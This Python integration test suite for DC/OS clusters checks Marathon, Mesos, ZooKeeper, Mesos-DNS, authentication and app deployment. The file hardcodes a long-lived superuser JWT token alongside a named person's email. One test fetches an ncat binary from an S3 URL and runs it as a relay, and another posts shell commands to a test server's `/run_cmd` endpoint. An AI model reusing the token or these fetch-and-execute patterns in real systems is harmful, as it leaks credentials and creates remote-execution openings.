logging.getLogger("requests").setLevel(logging.WARNING)
@contextlib.contextmanager
def _remove_env_vars(*env_vars):
environ = dict(os.environ)
for env_var in env_vars:
try:
del os.environ[env_var]
except KeyError:
pass
try:
yield
finally:
os.environ.clear()
os.environ.update(environ)
def _delete_ec2_volume(name, timeout=300):
"""Delete an EC2 EBS volume by its "Name" tag
Args:
timeout: seconds to wait for volume to become available for deletion
"""
@retrying.retry(wait_fixed=30 * 1000, stop_max_delay=timeout * 1000,
retry_on_exception=lambda exc: isinstance(exc, botocore.exceptions.ClientError))
def _delete_volume(volume):
volume.delete() # Raises ClientError if the volume is still attached.
def _get_current_aws_region():
try:
return requests.get('http://169.254.169.254/latest/meta-data/placement/availability-zone').text.strip()[:-1]
except requests.RequestException as ex:
logging.warning("Can't get AWS region from instance metadata: {}".format(ex))
return None
# Remove AWS environment variables to force boto to use IAM credentials.
with _remove_env_vars('AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY'):
volumes = list(boto3.session.Session(
# We assume we're running these tests from a cluster node, so we
# can assume the region for the instance on which we're running is
# the same region in which any volumes were created.
region_name=_get_current_aws_region(),
).resource('ec2').volumes.filter(Filters=[{'Name': 'tag:Name', 'Values': [name]}]))
if len(volumes) == 0:
raise Exception('no volumes found with name {}'.format(name))
elif len(volumes) > 1:
raise Exception('multiple volumes found with name {}'.format(name))
volume = volumes[0]
try:
_delete_volume(volume)
except retrying.RetryError as ex:
raise Exception('Operation was not completed within {} seconds'.format(timeout)) from ex
class Cluster:
@retrying.retry(wait_fixed=1000,
retry_on_result=lambda ret: ret is False,
retry_on_exception=lambda x: False)
def _wait_for_Marathon_up(self):
r = self.get('/marathon/ui/')
# resp_code >= 500 -> backend is still down probably
if r.status_code < 500:
logging.info("Marathon is probably up")
return True
else:
msg = "Waiting for Marathon, resp code is: {}"
logging.info(msg.format(r.status_code))
return False
@retrying.retry(wait_fixed=1000,
retry_on_result=lambda ret: ret is False,
retry_on_exception=lambda x: False)
def _wait_for_slaves_to_join(self):
r = self.get('/mesos/master/slaves')
if r.status_code != 200:
msg = "Mesos master returned status code {} != 200 "
msg += "continuing to wait..."
logging.info(msg.format(r.status_code))
return False
data = r.json()
# Check that there are all the slaves the test knows about. They are all
# needed to pass the test.
num_slaves = len(data['slaves'])
if num_slaves >= len(self.all_slaves):
msg = "Sufficient ({} >= {}) number of slaves have joined the cluster"
logging.info(msg.format(num_slaves, self.all_slaves))
return True
else:
msg = "Current number of slaves: {} < {}, continuing to wait..."
logging.info(msg.format(num_slaves, self.all_slaves))
return False
@retrying.retry(wait_fixed=1000,
retry_on_result=lambda ret: ret is False,
retry_on_exception=lambda x: False)
def _wait_for_DCOS_history_up(self):
r = self.get('/dcos-history-service/ping')
# resp_code >= 500 -> backend is still down probably
if r.status_code <= 500:
logging.info("DC/OS History is probably up")
return True
else:
msg = "Waiting for DC/OS History, resp code is: {}"
logging.info(msg.format(r.status_code))
return False
@retrying.retry(wait_fixed=1000,
retry_on_result=lambda ret: ret is False,
retry_on_exception=lambda x: False)
def _wait_for_leader_election(self):
mesos_resolver = dns.resolver.Resolver()
mesos_resolver.nameservers = self.public_masters
mesos_resolver.port = 61053
try:
# Yeah, we can also put it in retry_on_exception, but
# this way we will loose debug messages
mesos_resolver.query('leader.mesos', 'A')
except dns.exception.DNSException as e:
msg = "Cannot resolve leader.mesos, error string: '{}', continuing to wait"
logging.info(msg.format(e))
return False
else:
logging.info("leader.mesos dns entry is UP!")
return True
@retrying.retry(wait_fixed=1000,
retry_on_result=lambda ret: ret is False,
retry_on_exception=lambda x: False)
def _wait_for_adminrouter_up(self):
try:
# Yeah, we can also put it in retry_on_exception, but
# this way we will loose debug messages
self.get(disable_suauth=True)
except requests.ConnectionError as e:
msg = "Cannot connect to nginx, error string: '{}', continuing to wait"
logging.info(msg.format(e))
return False
else:
logging.info("Nginx is UP!")
return True
def _wait_for_DCOS(self):
self._wait_for_leader_election()
self._wait_for_adminrouter_up()
self._authenticate()
self._wait_for_Marathon_up()
self._wait_for_slaves_to_join()
self._wait_for_DCOS_history_up()
def _authenticate(self):
if AUTH_ENABLED:
# token valid until 2036 for user albert@bekstil.net
# {
# "email": "albert@bekstil.net",
# "email_verified": true,
# "iss": "https://dcos.auth0.com/",
# "sub": "google-oauth2|109964499011108905050",
# "aud": "3yF5TOSzdlI45Q1xspxzeoGBe9fNxm9m",
# "exp": 2090884974,
# "iat": 1460164974
# }
js = {'token': 'eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImtpZCI6Ik9UQkVOakZFTWtWQ09VRTRPRVpGTlRNMFJrWXlRa015Tnprd1JrSkVRemRCTWpBM1FqYzVOZyJ9.eyJlbWFpbCI6ImFsYmVydEBiZWtzdGlsLm5ldCIsImVtYWlsX3ZlcmlmaWVkIjp0cnVlLCJpc3MiOiJodHRwczovL2Rjb3MuYXV0aDAuY29tLyIsInN1YiI6Imdvb2dsZS1vYXV0aDJ8MTA5OTY0NDk5MDExMTA4OTA1MDUwIiwiYXVkIjoiM3lGNVRPU3pkbEk0NVExeHNweHplb0dCZTlmTnhtOW0iLCJleHAiOjIwOTA4ODQ5NzQsImlhdCI6MTQ2MDE2NDk3NH0.OxcoJJp06L1z2_41_p65FriEGkPzwFB_0pA9ULCvwvzJ8pJXw9hLbmsx-23aY2f-ydwJ7LSibL9i5NbQSR2riJWTcW4N7tLLCCMeFXKEK4hErN2hyxz71Fl765EjQSO5KD1A-HsOPr3ZZPoGTBjE0-EFtmXkSlHb1T2zd0Z8T5Z2-q96WkFoT6PiEdbrDA-e47LKtRmqsddnPZnp0xmMQdTr2MjpVgvqG7TlRvxDcYc-62rkwQXDNSWsW61FcKfQ-TRIZSf2GS9F9esDF4b5tRtrXcBNaorYa9ql0XAWH5W_ct4ylRNl3vwkYKWa4cmPvOqT5Wlj9Tf0af4lNO40PQ'} # noqa
if LOGIN_UNAME and LOGIN_PW:
js = {'uid': LOGIN_UNAME, 'password': LOGIN_PW}
else:
# no authentication required
return
r = requests.post(self.dcos_uri + '/acs/api/v1/auth/login', json=js)
assert r.status_code == 200
self.superuser_auth_header = {
'Authorization': 'token=%s' % r.json()['token']
}
self.superuser_auth_cookie = r.cookies[
'dcos-acs-auth-cookie']
def __init__(self, dcos_uri, masters, public_masters, slaves, public_slaves, registry, dns_search_set, provider):
"""Proxy class for DC/OS clusters.
Args:
dcos_uri: address for the DC/OS web UI.
masters: list of Mesos master advertised IP addresses.
public_masters: list of Mesos master IP addresses routable from
the local host.
slaves: list of Mesos slave/agent advertised IP addresses.
registry: hostname or IP address of a private Docker registry.
dns_search_set: string indicating that a DNS search domain is
configured if its value is "true".
provider: onprem, azure, or aws
"""
self.masters = sorted(masters)
self.public_masters = sorted(public_masters)
self.slaves = sorted(slaves)
self.public_slaves = sorted(public_slaves)
self.all_slaves = sorted(slaves+public_slaves)
self.zk_hostports = ','.join(':'.join([host, '2181']) for host in self.public_masters)
self.registry = registry
self.dns_search_set = dns_search_set == 'true'
self.provider = provider
assert len(self.masters) == len(self.public_masters)
# URI must include scheme
assert dcos_uri.startswith('http')
# Make URI never end with /
self.dcos_uri = dcos_uri.rstrip('/')
self._wait_for_DCOS()
@staticmethod
def _marathon_req_headers():
return {'Accept': 'application/json, text/plain, */*'}
def _suheader(self, disable_suauth):
if not disable_suauth and AUTH_ENABLED:
return self.superuser_auth_header
return {}
def get(self, path="", params=None, disable_suauth=False, **kwargs):
hdrs = self._suheader(disable_suauth)
hdrs.update(kwargs.pop('headers', {}))
return requests.get(
self.dcos_uri + path, params=params, headers=hdrs, **kwargs)
def post(self, path="", payload=None, disable_suauth=False, **kwargs):
hdrs = self._suheader(disable_suauth)
hdrs.update(kwargs.pop('headers', {}))
if payload is None:
payload = {}
return requests.post(self.dcos_uri + path, json=payload, headers=hdrs)
def delete(self, path="", disable_suauth=False, **kwargs):
hdrs = self._suheader(disable_suauth)
hdrs.update(kwargs.pop('headers', {}))
return requests.delete(self.dcos_uri + path, headers=hdrs, **kwargs)
def head(self, path="", disable_suauth=False):
hdrs = self._suheader(disable_suauth)
return requests.head(self.dcos_uri + path, headers=hdrs)
def get_base_testapp_definition(self, docker_network_bridge=True, ip_per_container=False):
"""The test_server app used here is only guaranteed to exist if
the registry_cluster pytest fixture is used
"""
test_uuid = uuid.uuid4().hex
base_app = {
'id': TEST_APP_NAME_FMT.format(test_uuid),
'container': {
'type': 'DOCKER',
'docker': {
'image': '{}/test_server'.format(self.registry),
'forcePullImage': True,
},
},
'cmd': '/opt/test_server.py 9080',
'cpus': 0.1,
'mem': 64,
'instances': 1,
'healthChecks':
[
{
'protocol': 'HTTP',
'path': '/ping',
'portIndex': 0,
'gracePeriodSeconds': 5,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 3
}
],
"env": {
"DCOS_TEST_UUID": test_uuid
},
}
if docker_network_bridge:
base_app['container']['docker']['portMappings'] = [{
'containerPort': 9080,
'hostPort': 0,
'servicePort': 0,
'protocol': 'tcp',
}]
if ip_per_container:
base_app['container']['docker']['network'] = 'USER'
base_app['ipAddress'] = {'networkName': 'dcos'}
else:
base_app['container']['docker']['network'] = 'BRIDGE'
base_app['ports'] = []
else:
base_app['cmd'] = '/opt/test_server.py $PORT0'
base_app['container']['docker']['network'] = 'HOST'
base_app['ports'] = [0]
return base_app, test_uuid
def deploy_marathon_app(self, app_definition, timeout=300, check_health=True, ignore_failed_tasks=False):
"""Deploy an app to marathon
This function deploys an an application and then waits for marathon to
aknowledge it's successfull creation or fails the test.
The wait for application is immediatelly aborted if Marathon returns
nonempty 'lastTaskFailure' field. Otherwise it waits until all the
instances reach tasksRunning and then tasksHealthy state.
Args:
app_definition: a dict with application definition as specified in
Marathon API (https://mesosphere.github.io/marathon/docs/rest-api.html#post-v2-apps)
timeout: a time to wait for the application to reach 'Healthy' status
after which the test should be failed.
check_health: wait until Marathon reports tasks as healthy before
returning
Returns:
A list of named tuples which represent service points of deployed
applications. I.E:
[Endpoint(host='172.17.10.202', port=10464), Endpoint(host='172.17.10.201', port=1630)]
"""
r = self.post('/marathon/v2/apps', app_definition, headers=self._marathon_req_headers())
logging.info('Response from marathon: {}'.format(repr(r.json())))
assert r.ok
@retrying.retry(wait_fixed=1000, stop_max_delay=timeout*1000,
retry_on_result=lambda ret: ret is None,
retry_on_exception=lambda x: False)
def _pool_for_marathon_app(app_id):
Endpoint = collections.namedtuple("Endpoint", ["host", "port", "ip"])
# Some of the counters need to be explicitly enabled now and/or in
# future versions of Marathon:
req_params = (('embed', 'apps.lastTaskFailure'),
('embed', 'apps.counts'))
req_uri = '/marathon/v2/apps' + app_id
r = self.get(req_uri, req_params, headers=self._marathon_req_headers())
assert r.ok
data = r.json()
if not ignore_failed_tasks:
assert 'lastTaskFailure' not in data['app'], (
'Application deployment failed, reason: {}'.format(data['app']['lastTaskFailure']['message'])
)
if (
data['app']['tasksRunning'] == app_definition['instances'] and
(not check_health or data['app']['tasksHealthy'] == app_definition['instances'])
):
res = [Endpoint(t['host'], t['ports'][0], t['ipAddresses'][0]['ipAddress'])
for t in data['app']['tasks']]
logging.info('Application deployed, running on {}'.format(res))
return res
else:
logging.info('Waiting for application to be deployed %s', repr(data))
return None
try:
return _pool_for_marathon_app(app_definition['id'])
except retrying.RetryError:
pytest.fail("Application deployment failed - operation was not "
"completed in {} seconds.".format(timeout))
def destroy_marathon_app(self, app_name, timeout=300):
"""Remove a marathon app
Abort the test if the removal was unsuccesful.
Args:
app_name: name of the applicatoin to remove
timeout: seconds to wait for destruction before failing test
"""
@retrying.retry(wait_fixed=1000, stop_max_delay=timeout*1000,
retry_on_result=lambda ret: not ret,
retry_on_exception=lambda x: False)
def _destroy_complete(deployment_id):
r = self.get('/marathon/v2/deployments', headers=self._marathon_req_headers())
assert r.ok
for deployment in r.json():
if deployment_id == deployment.get('id'):
logging.info('Waiting for application to be destroyed')
return False
logging.info('Application destroyed')
return True
r = self.delete('/marathon/v2/apps' + app_name, headers=self._marathon_req_headers())
assert r.ok
try:
_destroy_complete(r.json()['deploymentId'])
except retrying.RetryError:
pytest.fail("Application destroy failed - operation was not "
"completed in {} seconds.".format(timeout))
def test_if_DCOS_UI_is_up(cluster):
r = cluster.get('/')
assert r.status_code == 200
assert len(r.text) > 100
assert 'DC/OS' in r.text
# Not sure if it's really needed, seems a bit of an overkill:
soup = bs4.BeautifulSoup(r.text, "html.parser")
for link in soup.find_all(['link', 'a'], href=True):
if urllib.parse.urlparse(link.attrs['href']).netloc:
# Relative URLs only, others are to complex to handle here
continue
# Some links might start with a dot (e.g. ./img/...). Remove.
href = link.attrs['href'].lstrip('.')
link_response = cluster.head(href)
assert link_response.status_code == 200
def test_adminrouter_access_control_enforcement(auth_cluster):
r = auth_cluster.get('/acs/api/v1', disable_suauth=True)
assert r.status_code == 401
assert r.headers['WWW-Authenticate'] in ('acsjwt', 'oauthjwt')
# Make sure that this is UI's error page body,
# including some JavaScript.
assert '<html>' in r.text
assert '</html>' in r.text
assert 'window.location' in r.text
# Verify that certain locations are forbidden to access
# when not authed, but are reachable as superuser.
for path in ('/mesos_dns/v1/config', '/service/marathon/', '/mesos/'):
r = auth_cluster.get(path, disable_suauth=True)
assert r.status_code == 401
r = auth_cluster.get(path)
assert r.status_code == 200
# Test authentication with auth cookie instead of Authorization header.
authcookie = {
'dcos-acs-auth-cookie': auth_cluster.superuser_auth_cookie
}
r = auth_cluster.get(
'/service/marathon/',
disable_suauth=True,
cookies=authcookie
)
assert r.status_code == 200
def test_logout(auth_cluster):
"""Test logout endpoint. It's a soft logout, instructing
the user agent to delete the authentication cookie, i.e. this test
does not have side effects on other tests.
"""
r = auth_cluster.get('/acs/api/v1/auth/logout')
cookieheader = r.headers['set-cookie']
assert 'dcos-acs-auth-cookie=;' in cookieheader
assert 'expires' in cookieheader.lower()
def test_if_Mesos_is_up(cluster):
r = cluster.get('/mesos')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Mesos</title>' in r.text
def test_if_all_Mesos_slaves_have_registered(cluster):
r = cluster.get('/mesos/master/slaves')
assert r.status_code == 200
data = r.json()
slaves_ips = sorted(x['hostname'] for x in data['slaves'])
assert slaves_ips == cluster.all_slaves
# Retry if returncode is False, do not retry on exceptions.
@retrying.retry(wait_fixed=2000,
retry_on_result=lambda r: r is False,
retry_on_exception=lambda _: False)
def test_if_srouter_slaves_endpoint_work(cluster):
# Get currently known agents. This request is served straight from
# Mesos (no AdminRouter-based caching is involved).
r = cluster.get('/mesos/master/slaves')
assert r.status_code == 200
data = r.json()
slaves_ids = sorted(x['id'] for x in data['slaves'])
for slave_id in slaves_ids:
# AdminRouter's slave endpoint internally uses cached Mesos
# state data. That is, slave IDs of just recently joined
# slaves can be unknown here. For those, this endpoint
# returns a 404. Retry in this case, until this endpoint
# is confirmed to work for all known agents.
uri = '/slave/{}/slave%281%29/state.json'.format(slave_id)
r = cluster.get(uri)
if r.status_code == 404:
return False
assert r.status_code == 200
data = r.json()
assert "id" in data
assert data["id"] == slave_id
def test_if_all_Mesos_masters_have_registered(cluster):
# Currently it is not possible to extract this information through Mesos'es
# API, let's query zookeeper directly.
zk = kazoo.client.KazooClient(hosts=cluster.zk_hostports, read_only=True)
master_ips = []
zk.start()
for znode in zk.get_children("/mesos"):
if not znode.startswith("json.info_"):
continue
master = json.loads(zk.get("/mesos/" + znode)[0].decode('utf-8'))
master_ips.append(master['address']['ip'])
zk.stop()
assert sorted(master_ips) == cluster.masters
def test_if_Exhibitor_API_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/list')
assert r.status_code == 200
data = r.json()
assert data["port"] > 0
def test_if_Exhibitor_UI_is_up(cluster):
r = cluster.get('/exhibitor')
assert r.status_code == 200
assert 'Exhibitor for ZooKeeper' in r.text
def test_if_ZooKeeper_cluster_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
data = r.json()
serving_zks = sum(1 for x in data if x['code'] == 3)
zks_ips = sorted(x['hostname'] for x in data)
zks_leaders = sum(1 for x in data if x['isLeader'])
assert zks_ips == cluster.masters
assert serving_zks == len(cluster.masters)
assert zks_leaders == 1
def test_if_all_exhibitors_are_in_sync(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
correct_data = sorted(r.json(), key=lambda k: k['hostname'])
for zk_ip in cluster.public_masters:
resp = requests.get('http://{}:8181/exhibitor/v1/cluster/status'.format(zk_ip))
assert resp.status_code == 200
tested_data = sorted(resp.json(), key=lambda k: k['hostname'])
assert correct_data == tested_data
def test_if_uiconfig_is_available(cluster):
r = cluster.get('/dcos-metadata/ui-config.json')
assert r.status_code == 200
assert 'uiConfiguration' in r.json()
def test_if_DCOSHistoryService_is_up(cluster):
r = cluster.get('/dcos-history-service/ping')
assert r.status_code == 200
assert 'pong' == r.text
def test_if_Marathon_UI_is_up(cluster):
r = cluster.get('/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_srouter_service_endpoint_works(cluster):
r = cluster.get('/service/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_Mesos_API_is_up(cluster):
r = cluster.get('/mesos_dns/v1/version')
assert r.status_code == 200
data = r.json()
assert data["Service"] == 'Mesos-DNS'
def test_if_PkgPanda_metadata_is_available(cluster):
r = cluster.get('/pkgpanda/active.buildinfo.full.json')
assert r.status_code == 200
data = r.json()
assert 'mesos' in data
assert len(data) > 5 # (prozlach) We can try to put minimal number of pacakages required
def test_if_Marathon_app_can_be_deployed(registry_cluster):
"""Marathon app deployment integration test
This test verifies that marathon app can be deployed, and that service points
returned by Marathon indeed point to the app that was deployed.
The application being deployed is a simple http server written in python.
Please check test/dockers/test_server for more details.
This is done by assigning an unique UUID to each app and passing it to the
docker container as an env variable. After successfull deployment, the
"GET /test_uuid" request is issued to the app. If the returned UUID matches
the one assigned to test - test succeds.
"""
cluster = registry_cluster
app_definition, test_uuid = cluster.get_base_testapp_definition()
service_points = cluster.deploy_marathon_app(app_definition)
r = requests.get('http://{}:{}/test_uuid'.format(service_points[0].host,
service_points[0].port))
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{0} {1}. "
msg += "Detailed explanation of the problem: {2}"
pytest.fail(msg.format(r.status_code, r.reason, r.text))
r_data = r.json()
assert r_data['test_uuid'] == test_uuid
cluster.destroy_marathon_app(app_definition['id'])
def _service_discovery_test(cluster, docker_network_bridge=True):
"""Service discovery integration test
This test verifies if service discovery works, by comparing marathon data
with information from mesos-dns and from containers themselves.
This is achieved by deploying an application to marathon with two instances
, and ["hostname", "UNIQUE"] contraint set. This should result in containers
being deployed to two different slaves.
The application being deployed is a simple http server written in python.
Please check test/dockers/test_server for more details.
Next thing is comparing the service points provided by marathon with those
reported by mesos-dns. The tricky part here is that may take some time for
mesos-dns to catch up with changes in the cluster.
And finally, one of service points is verified in as-seen-by-other-containers
fashion.
+------------------------+ +------------------------+
| Slave 1 | | Slave 2 |
| | | |
| +--------------------+ | | +--------------------+ |
+--------------+ | | | | | | | |
| | | | App instance A +------>+ App instance B | |
| TC Agent +<---->+ | | | | | |
| | | | "test server" +<------+ "reflector" | |
+--------------+ | | | | | | | |
| +--------------------+ | | +--------------------+ |
+------------------------+ +------------------------+
Code running on TC agent connects to one of the containers (let's call it
"test server") and makes a POST request with IP and PORT service point of
the second container as parameters (let's call it "reflector"). The test
server in turn connects to other container and makes a "GET /reflect"
request. The reflector responds with test server's IP as seen by it and
the session UUID as provided to it by Marathon. This data is then returned
to TC agent in response to POST request issued earlier.
The test succeds if test UUIDs of the test server, reflector and the test
itself match and the IP of the test server matches the service point of that
container as reported by Marathon.
"""
app_definition, test_uuid = cluster.get_base_testapp_definition(docker_network_bridge=docker_network_bridge)
app_definition['instances'] = 2
if len(cluster.slaves) >= 2:
app_definition["constraints"] = [["hostname", "UNIQUE"], ]
service_points = cluster.deploy_marathon_app(app_definition)
# Verify if Mesos-DNS agrees with Marathon:
@retrying.retry(wait_fixed=1000,
stop_max_delay=MESOS_DNS_ENTRY_UPDATE_TIMEOUT*1000,
retry_on_result=lambda ret: ret is None,
retry_on_exception=lambda x: False)
def _pool_for_mesos_dns():
r = cluster.get('/mesos_dns/v1/services/_{}._tcp.marathon.mesos'.format(
app_definition['id'].lstrip('/')))
assert r.status_code == 200
r_data = r.json()
if r_data == [{'host': '', 'port': '', 'service': '', 'ip': ''}] or \
len(r_data) < len(service_points):
logging.info("Waiting for Mesos-DNS to update entries")
return None
else:
logging.info("Mesos-DNS entries have been updated!")
return r_data
try:
r_data = _pool_for_mesos_dns()
except retrying.RetryError:
msg = "Mesos DNS has failed to update entries in {} seconds."
pytest.fail(msg.format(MESOS_DNS_ENTRY_UPDATE_TIMEOUT))
marathon_provided_servicepoints = sorted((x.host, x.port) for x in service_points)
mesosdns_provided_servicepoints = sorted((x['ip'], int(x['port'])) for x in r_data)
assert marathon_provided_servicepoints == mesosdns_provided_servicepoints
# Verify if containers themselves confirm what Marathon says:
payload = {"reflector_ip": service_points[1].host,
"reflector_port": service_points[1].port}
r = requests.post('http://{}:{}/your_ip'.format(service_points[0].host,
service_points[0].port),
payload)
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{status_code} {reason}. "
msg += "Detailed explanation of the problem: {text}"
pytest.fail(msg.format(status_code=r.status_code, reason=r.reason,
text=r.text))
r_data = r.json()
assert r_data['reflector_uuid'] == test_uuid
assert r_data['test_uuid'] == test_uuid
if len(cluster.slaves) >= 2:
# When len(slaves)==1, we are connecting through docker-proxy using
# docker0 interface ip. This makes this assertion useless, so we skip
# it and rely on matching test uuid between containers only.
assert r_data['my_ip'] == service_points[0].host
cluster.destroy_marathon_app(app_definition['id'])
def test_if_service_discovery_works_docker_bridged_network(registry_cluster):
return _service_discovery_test(registry_cluster, docker_network_bridge=True)
def test_if_service_discovery_works_docker_host_network(registry_cluster):
return _service_discovery_test(registry_cluster, docker_network_bridge=False)
def test_if_search_is_working(registry_cluster):
"""Test if custom set search is working.
Verifies that a marathon app running on the cluster can resolve names using
searching the "search" the cluster was launched with (if any). It also tests
that absolute searches still work, and search + things that aren't
subdomains fails properly.
The application being deployed is a simple http server written in python.
Please check test/dockers/test_server for more details.
"""
cluster = registry_cluster
# Launch the app
app_definition, test_uuid = cluster.get_base_testapp_definition()
service_points = cluster.deploy_marathon_app(app_definition)
# Get the status
r = requests.get('http://{}:{}/dns_search'.format(service_points[0].host,
service_points[0].port))
if r.status_code != 200:
msg = "Test server replied with non-200 reply: '{0} {1}. "
msg += "Detailed explanation of the problem: {2}"
pytest.fail(msg.format(r.status_code, r.reason, r.text))
r_data = r.json()
# Make sure we hit the app we expected
assert r_data['test_uuid'] == test_uuid
expected_error = {'error': '[Errno -2] Name or service not known'}
# Check that result matches expectations for this cluster
if cluster.dns_search_set:
assert r_data['search_hit_leader'] in cluster.masters
assert r_data['always_hit_leader'] in cluster.masters
assert r_data['always_miss'] == expected_error
else: # No dns search, search hit should miss.
assert r_data['search_hit_leader'] == expected_error
assert r_data['always_hit_leader'] in cluster.masters
assert r_data['always_miss'] == expected_error
cluster.destroy_marathon_app(app_definition['id'])
def test_if_DCOSHistoryService_is_getting_data(cluster):
r = cluster.get('/dcos-history-service/history/last')
assert r.status_code == 200
# Make sure some basic fields are present from state-summary which the DC/OS
# UI relies upon. Their exact content could vary so don't test the value.
json = r.json()
assert 'cluster' in json
assert 'frameworks' in json
assert 'slaves' in json
assert 'hostname' in json
def test_if_we_have_capabilities(cluster):
"""Indirectly test that Cosmos is up since this call is handled by Cosmos.
"""
r = cluster.get(
'/capabilities',
headers={
'Accept': 'application/vnd.dcos.capabilities+json;charset=utf-8;version=v1'
}
)
assert r.status_code == 200
assert {'name': 'PACKAGE_MANAGEMENT'} in r.json()['capabilities']
def test_octarine_http(cluster, timeout=30):
"""
Test if we are able to send traffic through octarine.
"""
test_uuid = uuid.uuid4().hex
proxy = ('"http://127.0.0.1:$(/opt/mesosphere/bin/octarine ' +
'--client --port marathon)"')
check_command = 'curl --fail --proxy {} marathon.mesos'.format(proxy)
app_definition = {
'id': '/integration-test-app-octarine-http-{}'.format(test_uuid),
'cpus': 0.1,
'mem': 128,
'ports': [0],
'cmd': '/opt/mesosphere/bin/octarine marathon',
'disk': 0,
'instances': 1,
'healthChecks': [{
'protocol': 'COMMAND',
'command': {
'value': check_command
},
'gracePeriodSeconds': 5,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 3
}]
}
cluster.deploy_marathon_app(app_definition)
def test_octarine_srv(cluster, timeout=30):
"""
Test resolving SRV records through octarine.
"""
# Limit string length so we don't go past the max SRV record length
test_uuid = uuid.uuid4().hex[:16]
proxy = ('"http://127.0.0.1:$(/opt/mesosphere/bin/octarine ' +
'--client --port marathon)"')
port_name = 'pinger'
cmd = ('/opt/mesosphere/bin/octarine marathon & ' +
'/opt/mesosphere/bin/python -m http.server ${PORT0}')
raw_app_id = 'integration-test-app-octarine-srv-{}'.format(test_uuid)
check_command = ('curl --fail --proxy {} _{}._{}._tcp.marathon.mesos')
check_command = check_command.format(proxy, port_name, raw_app_id)
app_definition = {
'id': '/{}'.format(raw_app_id),
'cpus': 0.1,
'mem': 128,
'cmd': cmd,
'disk': 0,
'instances': 1,
'portDefinitions': [
{
'port': 0,
'protocol': 'tcp',
'name': port_name,
'labels': {}
}
],
'healthChecks': [{
'protocol': 'COMMAND',
'command': {
'value': check_command
},
'gracePeriodSeconds': 5,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 3
}]
}
cluster.deploy_marathon_app(app_definition)
# By default telemetry-net sends the metrics about once a minute
# Therefore, we wait up till 2 minutes and a bit before we give up
def test_if_minuteman_routes_to_vip(cluster, timeout=125):
"""Test if we are able to connect to a task with a vip using minuteman.
"""
# Launch the app and proxy
test_uuid = uuid.uuid4().hex
app_definition = {
'id': "/integration-test-app-with-minuteman-vip-%s" % test_uuid,
'cpus': 0.1,
'mem': 128,
'cmd': 'touch imok && /opt/mesosphere/bin/python -mhttp.server ${PORT0}',
'portDefinitions': [
{
'port': 0,
'protocol': 'tcp',
'name': 'test',
'labels': {
'VIP_0': '1.2.3.4:5000'
}
}
],
'uris': [],
'instances': 1,
'healthChecks': [{
'protocol': 'HTTP',
'path': '/',
'portIndex': 0,
'gracePeriodSeconds': 5,
'intervalSeconds': 10,
'timeoutSeconds': 10,
'maxConsecutiveFailures': 3
}]
}
cluster.deploy_marathon_app(app_definition)
proxy_definition = {
'id': "/integration-test-proxy-to-minuteman-vip-%s" % test_uuid,
'cpus': 0.1,
'mem': 128,
'ports': [0],
'cmd': 'chmod 755 ncat && ./ncat -v --sh-exec "./ncat 1.2.3.4 5000" -l $PORT0 --keep-open',
'uris': ['https://s3.amazonaws.com/sargun-mesosphere/ncat'],
'instances': 1,
'healthChecks': [{
'protocol': 'COMMAND',
'command': {
'value': 'test "$(curl -o /dev/null --max-time 5 -4 -w \'%{http_code}\' -s http://localhost:${PORT0}/|cut -f1 -d" ")" == 200' # noqa
},
'gracePeriodSeconds': 0,
'intervalSeconds': 5,
'timeoutSeconds': 20,
'maxConsecutiveFailures': 3,
'ignoreHttp1xx': False
}],
}
service_points = cluster.deploy_marathon_app(proxy_definition)
@retrying.retry(wait_fixed=2000,
stop_max_delay=timeout*1000,
retry_on_result=lambda ret: ret is False,
retry_on_exception=lambda x: False)
def _ensure_routable():
r = requests.get('http://{}:{}'.format(service_points[0].host,
service_points[0].port))
assert(r.ok)
data = r.text
assert 'imok' in data
_ensure_routable()
def test_ip_per_container(registry_cluster):
"""Test if we are able to connect to a task with ip-per-container mode
"""
cluster = registry_cluster
# Launch the test_server in ip-per-container mode
app_definition, test_uuid = cluster.get_base_testapp_definition(ip_per_container=True)
app_definition['constraints'] = [['hostname', 'UNIQUE']]
if len(cluster.slaves) >= 2:
app_definition['instances'] = 2
else:
logging.warning('The IP Per Container tests needs 2 (private) agents to work')
service_points = cluster.deploy_marathon_app(app_definition, check_health=False)
@retrying.retry(wait_fixed=5000, stop_max_delay=300*1000,
retry_on_result=lambda ret: ret is False,
retry_on_exception=lambda x: False)
def _ensure_works():
app_port = app_definition['container']['docker']['portMappings'][0]['containerPort']
cmd = "curl -s -f http://{}:{}/ping".format(service_points[0].ip, app_port)
r = requests.post('http://{}:{}/run_cmd'.format(service_points[1].host, service_points[1].port), data=cmd)
logging.info('IP Per Container Curl Response: %s', repr(r.json()))
assert(r.json()['status'] == 0)
_ensure_works()
cluster.destroy_marathon_app(app_definition['id'])
@pytest.mark.ccm
def test_move_external_volume_to_new_agent(cluster):
"""Test that an external volume is successfully attached to a new agent.
If the cluster has only one agent, the volume will be detached and
reattached to the same agent.
"""
hosts = cluster.slaves[0], cluster.slaves[-1]
test_uuid = uuid.uuid4().hex
test_label = 'integration-test-move-external-volume-{}'.format(test_uuid)
mesos_volume_path = 'volume'
docker_volume_path = '/volume'
base_app = {
'mem': 32,
'cpus': 0.1,
'instances': 1,
'container': {
'volumes': [{
'mode': 'RW',
'external': {
'name': test_label,
'provider': 'dvdi',
'options': {'dvdi/driver': 'rexray'}
}
}]
}
}
write_app = copy.deepcopy(base_app)
write_app.update({
'id': '/{}/write'.format(test_label),
'cmd': (
# Check that the volume is empty.
'[ $(ls -A {volume_path}/ | grep -v --line-regexp "lost+found" | wc -l) -eq 0 ] && '
# Write the test UUID to a file.
'echo "{test_uuid}" >> {volume_path}/test && '
'while true; do sleep 1000; done'
).format(test_uuid=test_uuid, volume_path=mesos_volume_path),
